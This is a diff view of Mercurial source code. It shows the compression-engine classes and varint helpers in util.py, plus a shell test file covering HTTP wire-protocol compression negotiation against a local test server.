3807 3848 the data could not be compressed (too small, not compressible, etc).
3808 3849 The returned data should have a header uniquely identifying this
3809 3850 compression format so decompression can be routed to this engine.
3810 3851 This header should be identified by the ``revlogheader()`` return
3811 3852 value.
3812 3853
3813 3854 The object has a ``decompress(data)`` method that decompresses
3814 3855 data. The method will only be called if ``data`` begins with
3815 3856 ``revlogheader()``. The method should return the raw, uncompressed
3816 3857 data or raise a ``RevlogError``.
3817 3858
3818 3859 The object is reusable but is not thread safe.
3819 3860 """
3820 3861 raise NotImplementedError()
3821 3862
3822 3863 class _zlibengine(compressionengine):
3823 3864 def name(self):
3824 3865 return 'zlib'
3825 3866
3826 3867 def bundletype(self):
3827 3868 """zlib compression using the DEFLATE algorithm.
3828 3869
3829 3870 All Mercurial clients should support this format. The compression
3830 3871 algorithm strikes a reasonable balance between compression ratio
3831 3872 and size.
3832 3873 """
3833 3874 return 'gzip', 'GZ'
3834 3875
3835 3876 def wireprotosupport(self):
3836 3877 return compewireprotosupport('zlib', 20, 20)
3837 3878
3838 3879 def revlogheader(self):
3839 3880 return 'x'
3840 3881
3841 3882 def compressstream(self, it, opts=None):
3842 3883 opts = opts or {}
3843 3884
3844 3885 z = zlib.compressobj(opts.get('level', -1))
3845 3886 for chunk in it:
3846 3887 data = z.compress(chunk)
3847 3888 # Not all calls to compress emit data. It is cheaper to inspect
3848 3889 # here than to feed empty chunks through generator.
3849 3890 if data:
3850 3891 yield data
3851 3892
3852 3893 yield z.flush()
3853 3894
3854 3895 def decompressorreader(self, fh):
3855 3896 def gen():
3856 3897 d = zlib.decompressobj()
3857 3898 for chunk in filechunkiter(fh):
3858 3899 while chunk:
3859 3900 # Limit output size to limit memory.
3860 3901 yield d.decompress(chunk, 2 ** 18)
3861 3902 chunk = d.unconsumed_tail
3862 3903
3863 3904 return chunkbuffer(gen())
3864 3905
3865 3906 class zlibrevlogcompressor(object):
3866 3907 def compress(self, data):
3867 3908 insize = len(data)
3868 3909 # Caller handles empty input case.
3869 3910 assert insize > 0
3870 3911
3871 3912 if insize < 44:
3872 3913 return None
3873 3914
3874 3915 elif insize <= 1000000:
3875 3916 compressed = zlib.compress(data)
3876 3917 if len(compressed) < insize:
3877 3918 return compressed
3878 3919 return None
3879 3920
3880 3921 # zlib makes an internal copy of the input buffer, doubling
3881 3922 # memory usage for large inputs. So do streaming compression
3882 3923 # on large inputs.
3883 3924 else:
3884 3925 z = zlib.compressobj()
3885 3926 parts = []
3886 3927 pos = 0
3887 3928 while pos < insize:
3888 3929 pos2 = pos + 2**20
3889 3930 parts.append(z.compress(data[pos:pos2]))
3890 3931 pos = pos2
3891 3932 parts.append(z.flush())
3892 3933
3893 3934 if sum(map(len, parts)) < insize:
3894 3935 return ''.join(parts)
3895 3936 return None
3896 3937
3897 3938 def decompress(self, data):
3898 3939 try:
3899 3940 return zlib.decompress(data)
3900 3941 except zlib.error as e:
3901 3942 raise error.RevlogError(_('revlog decompress error: %s') %
3902 3943 forcebytestr(e))
3903 3944
3904 3945 def revlogcompressor(self, opts=None):
3905 3946 return self.zlibrevlogcompressor()
3906 3947
3907 3948 compengines.register(_zlibengine())
3908 3949
3909 3950 class _bz2engine(compressionengine):
3910 3951 def name(self):
3911 3952 return 'bz2'
3912 3953
3913 3954 def bundletype(self):
3914 3955 """An algorithm that produces smaller bundles than ``gzip``.
3915 3956
3916 3957 All Mercurial clients should support this format.
3917 3958
3918 3959 This engine will likely produce smaller bundles than ``gzip`` but
3919 3960 will be significantly slower, both during compression and
3920 3961 decompression.
3921 3962
3922 3963 If available, the ``zstd`` engine can yield similar or better
3923 3964 compression at much higher speeds.
3924 3965 """
3925 3966 return 'bzip2', 'BZ'
3926 3967
3927 3968 # We declare a protocol name but don't advertise by default because
3928 3969 # it is slow.
3929 3970 def wireprotosupport(self):
3930 3971 return compewireprotosupport('bzip2', 0, 0)
3931 3972
3932 3973 def compressstream(self, it, opts=None):
3933 3974 opts = opts or {}
3934 3975 z = bz2.BZ2Compressor(opts.get('level', 9))
3935 3976 for chunk in it:
3936 3977 data = z.compress(chunk)
3937 3978 if data:
3938 3979 yield data
3939 3980
3940 3981 yield z.flush()
3941 3982
3942 3983 def decompressorreader(self, fh):
3943 3984 def gen():
3944 3985 d = bz2.BZ2Decompressor()
3945 3986 for chunk in filechunkiter(fh):
3946 3987 yield d.decompress(chunk)
3947 3988
3948 3989 return chunkbuffer(gen())
3949 3990
3950 3991 compengines.register(_bz2engine())
3951 3992
3952 3993 class _truncatedbz2engine(compressionengine):
3953 3994 def name(self):
3954 3995 return 'bz2truncated'
3955 3996
3956 3997 def bundletype(self):
3957 3998 return None, '_truncatedBZ'
3958 3999
3959 4000 # We don't implement compressstream because it is hackily handled elsewhere.
3960 4001
3961 4002 def decompressorreader(self, fh):
3962 4003 def gen():
3963 4004 # The input stream doesn't have the 'BZ' header. So add it back.
3964 4005 d = bz2.BZ2Decompressor()
3965 4006 d.decompress('BZ')
3966 4007 for chunk in filechunkiter(fh):
3967 4008 yield d.decompress(chunk)
3968 4009
3969 4010 return chunkbuffer(gen())
3970 4011
3971 4012 compengines.register(_truncatedbz2engine())
3972 4013
3973 4014 class _noopengine(compressionengine):
3974 4015 def name(self):
3975 4016 return 'none'
3976 4017
3977 4018 def bundletype(self):
3978 4019 """No compression is performed.
3979 4020
3980 4021 Use this compression engine to explicitly disable compression.
3981 4022 """
3982 4023 return 'none', 'UN'
3983 4024
3984 4025 # Clients always support uncompressed payloads. Servers don't because
3985 4026 # unless you are on a fast network, uncompressed payloads can easily
3986 4027 # saturate your network pipe.
3987 4028 def wireprotosupport(self):
3988 4029 return compewireprotosupport('none', 0, 10)
3989 4030
3990 4031 # We don't implement revlogheader because it is handled specially
3991 4032 # in the revlog class.
3992 4033
3993 4034 def compressstream(self, it, opts=None):
3994 4035 return it
3995 4036
3996 4037 def decompressorreader(self, fh):
3997 4038 return fh
3998 4039
3999 4040 class nooprevlogcompressor(object):
4000 4041 def compress(self, data):
4001 4042 return None
4002 4043
4003 4044 def revlogcompressor(self, opts=None):
4004 4045 return self.nooprevlogcompressor()
4005 4046
4006 4047 compengines.register(_noopengine())
4007 4048
4008 4049 class _zstdengine(compressionengine):
4009 4050 def name(self):
4010 4051 return 'zstd'
4011 4052
4012 4053 @propertycache
4013 4054 def _module(self):
4014 4055 # Not all installs have the zstd module available. So defer importing
4015 4056 # until first access.
4016 4057 try:
4017 4058 from . import zstd
4018 4059 # Force delayed import.
4019 4060 zstd.__version__
4020 4061 return zstd
4021 4062 except ImportError:
4022 4063 return None
4023 4064
4024 4065 def available(self):
4025 4066 return bool(self._module)
4026 4067
4027 4068 def bundletype(self):
4028 4069 """A modern compression algorithm that is fast and highly flexible.
4029 4070
4030 4071 Only supported by Mercurial 4.1 and newer clients.
4031 4072
4032 4073 With the default settings, zstd compression is both faster and yields
4033 4074 better compression than ``gzip``. It also frequently yields better
4034 4075 compression than ``bzip2`` while operating at much higher speeds.
4035 4076
4036 4077 If this engine is available and backwards compatibility is not a
4037 4078 concern, it is likely the best available engine.
4038 4079 """
4039 4080 return 'zstd', 'ZS'
4040 4081
4041 4082 def wireprotosupport(self):
4042 4083 return compewireprotosupport('zstd', 50, 50)
4043 4084
4044 4085 def revlogheader(self):
4045 4086 return '\x28'
4046 4087
4047 4088 def compressstream(self, it, opts=None):
4048 4089 opts = opts or {}
4049 4090 # zstd level 3 is almost always significantly faster than zlib
4050 4091 # while providing no worse compression. It strikes a good balance
4051 4092 # between speed and compression.
4052 4093 level = opts.get('level', 3)
4053 4094
4054 4095 zstd = self._module
4055 4096 z = zstd.ZstdCompressor(level=level).compressobj()
4056 4097 for chunk in it:
4057 4098 data = z.compress(chunk)
4058 4099 if data:
4059 4100 yield data
4060 4101
4061 4102 yield z.flush()
4062 4103
4063 4104 def decompressorreader(self, fh):
4064 4105 zstd = self._module
4065 4106 dctx = zstd.ZstdDecompressor()
4066 4107 return chunkbuffer(dctx.read_from(fh))
4067 4108
4068 4109 class zstdrevlogcompressor(object):
4069 4110 def __init__(self, zstd, level=3):
4070 4111 # Writing the content size adds a few bytes to the output. However,
4071 4112 # it allows decompression to be more optimal since we can
4072 4113 # pre-allocate a buffer to hold the result.
4073 4114 self._cctx = zstd.ZstdCompressor(level=level,
4074 4115 write_content_size=True)
4075 4116 self._dctx = zstd.ZstdDecompressor()
4076 4117 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4077 4118 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4078 4119
4079 4120 def compress(self, data):
4080 4121 insize = len(data)
4081 4122 # Caller handles empty input case.
4082 4123 assert insize > 0
4083 4124
4084 4125 if insize < 50:
4085 4126 return None
4086 4127
4087 4128 elif insize <= 1000000:
4088 4129 compressed = self._cctx.compress(data)
4089 4130 if len(compressed) < insize:
4090 4131 return compressed
4091 4132 return None
4092 4133 else:
4093 4134 z = self._cctx.compressobj()
4094 4135 chunks = []
4095 4136 pos = 0
4096 4137 while pos < insize:
4097 4138 pos2 = pos + self._compinsize
4098 4139 chunk = z.compress(data[pos:pos2])
4099 4140 if chunk:
4100 4141 chunks.append(chunk)
4101 4142 pos = pos2
4102 4143 chunks.append(z.flush())
4103 4144
4104 4145 if sum(map(len, chunks)) < insize:
4105 4146 return ''.join(chunks)
4106 4147 return None
4107 4148
4108 4149 def decompress(self, data):
4109 4150 insize = len(data)
4110 4151
4111 4152 try:
4112 4153 # This was measured to be faster than other streaming
4113 4154 # decompressors.
4114 4155 dobj = self._dctx.decompressobj()
4115 4156 chunks = []
4116 4157 pos = 0
4117 4158 while pos < insize:
4118 4159 pos2 = pos + self._decompinsize
4119 4160 chunk = dobj.decompress(data[pos:pos2])
4120 4161 if chunk:
4121 4162 chunks.append(chunk)
4122 4163 pos = pos2
4123 4164 # Frame should be exhausted, so no finish() API.
4124 4165
4125 4166 return ''.join(chunks)
4126 4167 except Exception as e:
4127 4168 raise error.RevlogError(_('revlog decompress error: %s') %
4128 4169 forcebytestr(e))
4129 4170
4130 4171 def revlogcompressor(self, opts=None):
4131 4172 opts = opts or {}
4132 4173 return self.zstdrevlogcompressor(self._module,
4133 4174 level=opts.get('level', 3))
4134 4175
4135 4176 compengines.register(_zstdengine())
4136 4177
4137 4178 def bundlecompressiontopics():
4138 4179 """Obtains a list of available bundle compressions for use in help."""
4139 4180 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4140 4181 items = {}
4141 4182
4142 4183 # We need to format the docstring. So use a dummy object/type to hold it
4143 4184 # rather than mutating the original.
4144 4185 class docobject(object):
4145 4186 pass
4146 4187
4147 4188 for name in compengines:
4148 4189 engine = compengines[name]
4149 4190
4150 4191 if not engine.available():
4151 4192 continue
4152 4193
4153 4194 bt = engine.bundletype()
4154 4195 if not bt or not bt[0]:
4155 4196 continue
4156 4197
4157 4198 doc = pycompat.sysstr('``%s``\n %s') % (
4158 4199 bt[0], engine.bundletype.__doc__)
4159 4200
4160 4201 value = docobject()
4161 4202 value.__doc__ = doc
4162 4203 value._origdoc = engine.bundletype.__doc__
4163 4204 value._origfunc = engine.bundletype
4164 4205
4165 4206 items[bt[0]] = value
4166 4207
4167 4208 return items
4168 4209
4169 4210 i18nfunctions = bundlecompressiontopics().values()
4170 4211
4171 4212 # convenient shortcut
4172 4213 dst = debugstacktrace
4173 4214
4174 4215 def safename(f, tag, ctx, others=None):
4175 4216 """
4176 4217 Generate a name that it is safe to rename f to in the given context.
4177 4218
4178 4219 f: filename to rename
4179 4220 tag: a string tag that will be included in the new name
4180 4221 ctx: a context, in which the new name must not exist
4181 4222 others: a set of other filenames that the new name must not be in
4182 4223
4183 4224 Returns a file name of the form oldname~tag[~number] which does not exist
4184 4225 in the provided context and is not in the set of other names.
4185 4226 """
4186 4227 if others is None:
4187 4228 others = set()
4188 4229
4189 4230 fn = '%s~%s' % (f, tag)
4190 4231 if fn not in ctx and fn not in others:
4191 4232 return fn
4192 4233 for n in itertools.count(1):
4193 4234 fn = '%s~%s~%s' % (f, tag, n)
4194 4235 if fn not in ctx and fn not in others:
4195 4236 return fn
4196 4237
4197 4238 def readexactly(stream, n):
4198 4239 '''read n bytes from stream.read and abort if less was available'''
4199 4240 s = stream.read(n)
4200 4241 if len(s) < n:
4201 4242 raise error.Abort(_("stream ended unexpectedly"
4202 4243 " (got %d bytes, expected %d)")
4203 4244 % (len(s), n))
4204 4245 return s
4205 4246
4206 4247 def uvarintencode(value):
4207 4248 """Encode an unsigned integer value to a varint.
4208 4249
4209 4250 A varint is a variable length integer of 1 or more bytes. Each byte
4210 4251 except the last has the most significant bit set. The lower 7 bits of
4211 4252 each byte store the 2's complement representation, least significant group
4212 4253 first.
4213 4254
4214 4255 >>> uvarintencode(0)
4215 4256 '\\x00'
4216 4257 >>> uvarintencode(1)
4217 4258 '\\x01'
4218 4259 >>> uvarintencode(127)
4219 4260 '\\x7f'
4220 4261 >>> uvarintencode(1337)
4221 4262 '\\xb9\\n'
4222 4263 >>> uvarintencode(65536)
4223 4264 '\\x80\\x80\\x04'
4224 4265 >>> uvarintencode(-1)
4225 4266 Traceback (most recent call last):
4226 4267 ...
4227 4268 ProgrammingError: negative value for uvarint: -1
4228 4269 """
4229 4270 if value < 0:
4230 4271 raise error.ProgrammingError('negative value for uvarint: %d'
4231 4272 % value)
4232 4273 bits = value & 0x7f
4233 4274 value >>= 7
4234 4275 bytes = []
4235 4276 while value:
4236 4277 bytes.append(pycompat.bytechr(0x80 | bits))
4237 4278 bits = value & 0x7f
4238 4279 value >>= 7
4239 4280 bytes.append(pycompat.bytechr(bits))
4240 4281
4241 4282 return ''.join(bytes)
4242 4283
4243 4284 def uvarintdecodestream(fh):
4244 4285 """Decode an unsigned variable length integer from a stream.
4245 4286
4246 4287 The passed argument is anything that has a ``.read(N)`` method.
4247 4288
4248 4289 >>> try:
4249 4290 ... from StringIO import StringIO as BytesIO
4250 4291 ... except ImportError:
4251 4292 ... from io import BytesIO
4252 4293 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4253 4294 0
4254 4295 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4255 4296 1
4256 4297 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4257 4298 127
4258 4299 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4259 4300 1337
4260 4301 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4261 4302 65536
4262 4303 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4263 4304 Traceback (most recent call last):
4264 4305 ...
4265 4306 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4266 4307 """
4267 4308 result = 0
4268 4309 shift = 0
4269 4310 while True:
4270 4311 byte = ord(readexactly(fh, 1))
4271 4312 result |= ((byte & 0x7f) << shift)
4272 4313 if not (byte & 0x80):
4273 4314 return result
4274 4315 shift += 7
4275 4316
4276 4317 ###
4277 4318 # Deprecation warnings for util.py splitting
4278 4319 ###
4279 4320
4280 4321 defaultdateformats = dateutil.defaultdateformats
4281 4322
4282 4323 extendeddateformats = dateutil.extendeddateformats
4283 4324
4284 4325 def makedate(*args, **kwargs):
4285 4326 msg = ("'util.makedate' is deprecated, "
4286 4327 "use 'utils.dateutil.makedate'")
4287 4328 nouideprecwarn(msg, "4.6")
4288 4329 return dateutil.makedate(*args, **kwargs)
4289 4330
4290 4331 def datestr(*args, **kwargs):
4291 4332 msg = ("'util.datestr' is deprecated, "
4292 4333 "use 'utils.dateutil.datestr'")
4293 4334 nouideprecwarn(msg, "4.6")
4294 4335 return dateutil.datestr(*args, **kwargs)
4295 4336
4296 4337 def shortdate(*args, **kwargs):
4297 4338 msg = ("'util.shortdate' is deprecated, "
4298 4339 "use 'utils.dateutil.shortdate'")
4299 4340 nouideprecwarn(msg, "4.6")
4300 4341 return dateutil.shortdate(*args, **kwargs)
4301 4342
4302 4343 def parsetimezone(*args, **kwargs):
4303 4344 msg = ("'util.parsetimezone' is deprecated, "
4304 4345 "use 'utils.dateutil.parsetimezone'")
4305 4346 nouideprecwarn(msg, "4.6")
4306 4347 return dateutil.parsetimezone(*args, **kwargs)
4307 4348
4308 4349 def strdate(*args, **kwargs):
4309 4350 msg = ("'util.strdate' is deprecated, "
4310 4351 "use 'utils.dateutil.strdate'")
4311 4352 nouideprecwarn(msg, "4.6")
4312 4353 return dateutil.strdate(*args, **kwargs)
4313 4354
4314 4355 def parsedate(*args, **kwargs):
4315 4356 msg = ("'util.parsedate' is deprecated, "
4316 4357 "use 'utils.dateutil.parsedate'")
4317 4358 nouideprecwarn(msg, "4.6")
4318 4359 return dateutil.parsedate(*args, **kwargs)
4319 4360
4320 4361 def matchdate(*args, **kwargs):
4321 4362 msg = ("'util.matchdate' is deprecated, "
4322 4363 "use 'utils.dateutil.matchdate'")
4323 4364 nouideprecwarn(msg, "4.6")
4324 4365 return dateutil.matchdate(*args, **kwargs)
@@ -1,264 +1,241 b''
1 1 $ cat >> $HGRCPATH << EOF
2 2 > [web]
3 3 > push_ssl = false
4 4 > allow_push = *
5 5 > EOF
6 6
7 7 $ hg init server
8 8 $ cd server
9 9 $ touch a
10 10 $ hg -q commit -A -m initial
11 11 $ cd ..
12 12
13 13 $ hg serve -R server -p $HGPORT -d --pid-file hg.pid
14 14 $ cat hg.pid >> $DAEMON_PIDS
15 15
16 16 compression formats are advertised in compression capability
17 17
18 18 #if zstd
19 19 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=capabilities' | tr ' ' '\n' | grep '^compression=zstd,zlib$' > /dev/null
20 20 #else
21 21 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=capabilities' | tr ' ' '\n' | grep '^compression=zlib$' > /dev/null
22 22 #endif
23 23
24 24 $ killdaemons.py
25 25
26 26 server.compressionengines can replace engines list wholesale
27 27
28 28 $ hg serve --config server.compressionengines=none -R server -p $HGPORT -d --pid-file hg.pid
29 29 $ cat hg.pid > $DAEMON_PIDS
30 30 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=capabilities' | tr ' ' '\n' | grep '^compression=none$' > /dev/null
31 31
32 32 $ killdaemons.py
33 33
34 34 Order of engines can also change
35 35
36 36 $ hg serve --config server.compressionengines=none,zlib -R server -p $HGPORT -d --pid-file hg.pid
37 37 $ cat hg.pid > $DAEMON_PIDS
38 38 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=capabilities' | tr ' ' '\n' | grep '^compression=none,zlib$' > /dev/null
39 39
40 40 $ killdaemons.py
41 41
42 42 Start a default server again
43 43
44 44 $ hg serve -R server -p $HGPORT -d --pid-file hg.pid
45 45 $ cat hg.pid > $DAEMON_PIDS
46 46
47 47 Server should send application/mercurial-0.1 to clients if no Accept is used
48 48
49 49 $ get-with-headers.py --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
50 50 200 Script output follows
51 51 content-type: application/mercurial-0.1
52 52 date: $HTTP_DATE$
53 53 server: testing stub value
54 54 transfer-encoding: chunked
55 55
56 56 Server should send application/mercurial-0.1 when client says it wants it
57 57
58 58 $ get-with-headers.py --hgproto '0.1' --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
59 59 200 Script output follows
60 60 content-type: application/mercurial-0.1
61 61 date: $HTTP_DATE$
62 62 server: testing stub value
63 63 transfer-encoding: chunked
64 64
65 65 Server should send application/mercurial-0.2 when client says it wants it
66 66
67 67 $ get-with-headers.py --hgproto '0.2' --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
68 68 200 Script output follows
69 69 content-type: application/mercurial-0.2
70 70 date: $HTTP_DATE$
71 71 server: testing stub value
72 72 transfer-encoding: chunked
73 73
74 74 $ get-with-headers.py --hgproto '0.1 0.2' --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
75 75 200 Script output follows
76 76 content-type: application/mercurial-0.2
77 77 date: $HTTP_DATE$
78 78 server: testing stub value
79 79 transfer-encoding: chunked
80 80
81 81 Requesting a compression format that server doesn't support results will fall back to 0.1
82 82
83 83 $ get-with-headers.py --hgproto '0.2 comp=aa' --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' -
84 84 200 Script output follows
85 85 content-type: application/mercurial-0.1
86 86 date: $HTTP_DATE$
87 87 server: testing stub value
88 88 transfer-encoding: chunked
89 89
90 90 #if zstd
91 91 zstd is used if available
92 92
93 93 $ get-with-headers.py --hgproto '0.2 comp=zstd' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
94 94 $ f --size --hexdump --bytes 36 --sha1 resp
95 95 resp: size=248, sha1=4d8d8f87fb82bd542ce52881fdc94f850748
96 96 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
97 97 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 04 7a 73 74 64 |t follows...zstd|
98 98 0020: 28 b5 2f fd |(./.|
99 99
100 100 #endif
101 101
102 102 application/mercurial-0.2 is not yet used on non-streaming responses
103 103
104 104 $ get-with-headers.py --hgproto '0.2' $LOCALIP:$HGPORT '?cmd=heads' -
105 105 200 Script output follows
106 106 content-length: 41
107 107 content-type: application/mercurial-0.1
108 108 date: $HTTP_DATE$
109 109 server: testing stub value
110 110
111 111 e93700bd72895c5addab234c56d4024b487a362f
112 112
113 113 Now test protocol preference usage
114 114
115 115 $ killdaemons.py
116 116 $ hg serve --config server.compressionengines=none,zlib -R server -p $HGPORT -d --pid-file hg.pid
117 117 $ cat hg.pid > $DAEMON_PIDS
118 118
119 119 No Accept will send 0.1+zlib, even though "none" is preferred b/c "none" isn't supported on 0.1
120 120
121 121 $ get-with-headers.py --headeronly $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' Content-Type
122 122 200 Script output follows
123 123 content-type: application/mercurial-0.1
124 124
125 125 $ get-with-headers.py $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
126 126 $ f --size --hexdump --bytes 28 --sha1 resp
127 127 resp: size=227, sha1=35a4c074da74f32f5440da3cbf04
128 128 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
129 129 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 78 |t follows..x|
130 130
131 131 Explicit 0.1 will send zlib because "none" isn't supported on 0.1
132 132
133 133 $ get-with-headers.py --hgproto '0.1' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
134 134 $ f --size --hexdump --bytes 28 --sha1 resp
135 135 resp: size=227, sha1=35a4c074da74f32f5440da3cbf04
136 136 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
137 137 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 78 |t follows..x|
138 138
139 139 0.2 with no compression will get "none" because that is server's preference
140 140 (spec says ZL and UN are implicitly supported)
141 141
142 142 $ get-with-headers.py --hgproto '0.2' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
143 143 $ f --size --hexdump --bytes 32 --sha1 resp
144 144 resp: size=432, sha1=ac931b412ec185a02e0e5bcff98dac83
145 145 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
146 146 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 04 6e 6f 6e 65 |t follows...none|
147 147
148 148 Client receives server preference even if local order doesn't match
149 149
150 150 $ get-with-headers.py --hgproto '0.2 comp=zlib,none' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
151 151 $ f --size --hexdump --bytes 32 --sha1 resp
152 152 resp: size=432, sha1=ac931b412ec185a02e0e5bcff98dac83
153 153 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
154 154 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 04 6e 6f 6e 65 |t follows...none|
155 155
156 156 Client receives only supported format even if not server preferred format
157 157
158 158 $ get-with-headers.py --hgproto '0.2 comp=zlib' $LOCALIP:$HGPORT '?cmd=getbundle&heads=e93700bd72895c5addab234c56d4024b487a362f&common=0000000000000000000000000000000000000000' > resp
159 159 $ f --size --hexdump --bytes 33 --sha1 resp
160 160 resp: size=232, sha1=a1c727f0c9693ca15742a75c30419bc36
161 161 0000: 32 30 30 20 53 63 72 69 70 74 20 6f 75 74 70 75 |200 Script outpu|
162 162 0010: 74 20 66 6f 6c 6c 6f 77 73 0a 0a 04 7a 6c 69 62 |t follows...zlib|
163 163 0020: 78 |x|
164 164
165 165 $ killdaemons.py
166 166 $ cd ..
167 167
168 168 Test listkeys for listing namespaces
169 169
170 170 $ hg init empty
171 171 $ hg -R empty serve -p $HGPORT -d --pid-file hg.pid
172 172 $ cat hg.pid > $DAEMON_PIDS
173 173
174 174 $ hg --verbose debugwireproto http://$LOCALIP:$HGPORT << EOF
175 175 > command listkeys
176 176 > namespace namespaces
177 177 > EOF
178 s> sendall(*, 0): (glob)
179 178 s> GET /?cmd=capabilities HTTP/1.1\r\n
180 179 s> Accept-Encoding: identity\r\n
181 180 s> accept: application/mercurial-0.1\r\n
182 181 s> host: $LOCALIP:$HGPORT\r\n (glob)
183 182 s> user-agent: mercurial/proto-1.0 (Mercurial *)\r\n (glob)
184 183 s> \r\n
185 184 s> makefile('rb', None)
186 s> readline() -> 36:
187 185 s> HTTP/1.1 200 Script output follows\r\n
188 s> readline() -> 28:
189 186 s> Server: testing stub value\r\n
190 s> readline() -> *: (glob)
191 187 s> Date: $HTTP_DATE$\r\n
192 s> readline() -> 41:
193 188 s> Content-Type: application/mercurial-0.1\r\n
194 s> readline() -> 21:
195 189 s> Content-Length: *\r\n (glob)
196 s> readline() -> 2:
197 190 s> \r\n
198 s> read(*) -> *: lookup branchmap pushkey known getbundle unbundlehash batch changegroupsubset streamreqs=generaldelta,revlogv1 $USUAL_BUNDLE2_CAPS_SERVER$ unbundle=HG10GZ,HG10BZ,HG10UN httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx compression=$BUNDLE2_COMPRESSIONS$ (glob)
191 s> lookup branchmap pushkey known getbundle unbundlehash batch changegroupsubset streamreqs=generaldelta,revlogv1 $USUAL_BUNDLE2_CAPS_SERVER$ unbundle=HG10GZ,HG10BZ,HG10UN httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx compression=$BUNDLE2_COMPRESSIONS$
199 192 sending listkeys command
200 s> sendall(*, 0): (glob)
201 193 s> GET /?cmd=listkeys HTTP/1.1\r\n
202 194 s> Accept-Encoding: identity\r\n
203 195 s> vary: X-HgArg-1,X-HgProto-1\r\n
204 196 s> x-hgarg-1: namespace=namespaces\r\n
205 197 s> x-hgproto-1: 0.1 0.2 comp=$USUAL_COMPRESSIONS$\r\n
206 198 s> accept: application/mercurial-0.1\r\n
207 199 s> host: $LOCALIP:$HGPORT\r\n (glob)
208 200 s> user-agent: mercurial/proto-1.0 (Mercurial *)\r\n (glob)
209 201 s> \r\n
210 202 s> makefile('rb', None)
211 s> readline() -> 36:
212 203 s> HTTP/1.1 200 Script output follows\r\n
213 s> readline() -> 28:
214 204 s> Server: testing stub value\r\n
215 s> readline() -> *: (glob)
216 205 s> Date: $HTTP_DATE$\r\n
217 s> readline() -> 41:
218 206 s> Content-Type: application/mercurial-0.1\r\n
219 s> readline() -> 20:
220 207 s> Content-Length: 30\r\n
221 s> readline() -> 2:
222 208 s> \r\n
223 s> read(30) -> 30:
224 209 s> bookmarks \n
225 210 s> namespaces \n
226 211 s> phases
227 212 response: bookmarks \nnamespaces \nphases
228 213
229 214 Same thing, but with "httprequest" command
230 215
231 216 $ hg --verbose debugwireproto --peer raw http://$LOCALIP:$HGPORT << EOF
232 217 > httprequest GET ?cmd=listkeys
233 218 > accept: application/mercurial-0.1
234 219 > user-agent: mercurial/proto-1.0 (Mercurial 42)
235 220 > x-hgarg-1: namespace=namespaces
236 221 > EOF
237 222 using raw connection to peer
238 s> sendall(*, 0): (glob)
239 223 s> GET /?cmd=listkeys HTTP/1.1\r\n
240 224 s> Accept-Encoding: identity\r\n
241 225 s> accept: application/mercurial-0.1\r\n
242 226 s> user-agent: mercurial/proto-1.0 (Mercurial 42)\r\n
243 227 s> x-hgarg-1: namespace=namespaces\r\n
244 228 s> host: $LOCALIP:$HGPORT\r\n (glob)
245 229 s> \r\n
246 230 s> makefile('rb', None)
247 s> readline() -> 36:
248 231 s> HTTP/1.1 200 Script output follows\r\n
249 s> readline() -> 28:
250 232 s> Server: testing stub value\r\n
251 s> readline() -> *: (glob)
252 233 s> Date: $HTTP_DATE$\r\n
253 s> readline() -> 41:
254 234 s> Content-Type: application/mercurial-0.1\r\n
255 s> readline() -> 20:
256 235 s> Content-Length: 30\r\n
257 s> readline() -> 2:
258 236 s> \r\n
259 s> read(30) -> 30:
260 237 s> bookmarks \n
261 238 s> namespaces \n
262 239 s> phases
263 240
264 241 $ killdaemons.py
General Comments 0
You need to be logged in to leave comments. Login now